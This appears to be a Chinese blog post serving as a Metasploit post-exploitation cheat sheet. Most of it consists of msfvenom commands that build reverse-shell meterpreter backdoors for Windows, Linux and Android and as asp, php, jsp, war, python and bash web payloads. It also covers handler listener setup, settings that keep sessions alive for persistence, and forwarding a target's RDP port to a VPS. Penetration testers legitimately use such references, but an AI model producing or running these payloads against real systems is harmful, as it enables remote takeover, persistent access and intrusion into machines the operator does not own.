msf后渗透常用命令-window、linux、安卓、webshell
查找所有模块:
msfvenom -l platforms
查找对应模块有meterpreter控制台的后门:
msfvenom -l payloads | grep windows | grep meterpreter
msfvenom -l payloads | grep windows | grep reverse_tcp
常用生成命令:
windows:
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=kali LPORT=5757 -f exe > /root/shell0518.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali LPORT=1234 -f exe -o /root/shell.exe
linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=kali LPORT=111 -f elf > /1.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=kali LPORT=111 -f elf > /1.elf
安卓:
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.9.136.152 LPORT=4444 R >android_yuanboss.apk
安卓监听端:
set payload android/meterpreter/reverse_tcp
脚本语言:
web类型载荷
asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > /1.asp
aspx
msfvenom -p windows/x64/meterpreter/reverse_tcp LLHOST=<IP> LPORT=<PORT> -f aspx > /1.aspx
php
msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > /1.php
jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > ~/Desktop/1.jsp
war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
python
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py
bash
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh
使用:
use exploit/multi/handler
set PAYLOAD <对应Payload>
set LHOST <IP>
set LPORT <Port>
exploit
msf权限维持使用命令:
set ExitOnSession false
//可以在接收到seesion后继续监听端口,保持侦听
set SessionCommunicationTimeout 0 //默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0
exploit -j -z
msf端口转发:
下面的命令是将目标机的3389转发到vps的12341端口
portfwd add -l 12341 -r 127.0.0.1 -p 3389
根据端口查找进程:
[root@lg ~]# netstat -nlp | grep 8830
tcp6 0 0 :::8830 :::* LISTEN 1375/java
其中1375为进程id
根据进程ID立刻杀死进程
kill -9 1375
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步